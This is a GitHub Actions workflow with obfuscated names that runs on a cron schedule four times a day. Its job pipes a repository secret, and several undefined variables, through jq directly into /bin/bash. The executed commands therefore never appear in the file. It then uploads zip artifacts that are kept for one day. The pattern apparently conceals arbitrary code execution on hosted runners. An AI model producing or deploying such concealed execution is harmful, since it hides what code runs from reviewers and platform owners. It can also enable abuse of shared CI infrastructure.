name: yuexiaxiufeng
on:
  workflow_dispatch:

  schedule:
    - cron: '24 2,8,14,20 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuexiaxiufeng
        env:
          vgpg445: ${{ secrets.vgpg445 }}
        run: |
          printf '%s' "$vgpg445" | jq -r .d4359 | /bin/bash
          echo $pqry010 | jq -r .t75 | /bin/bash
          echo $yvyeh31 | jq -r .lbfne3 | /bin/bash
          echo $gnxd0853 | jq -r .as55 | /bin/bash
          printf '%s' "$cqy00258" | jq -r .lesn3198 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: P1Xf7jgK
          path: "*.zip"
          retention-days: 1
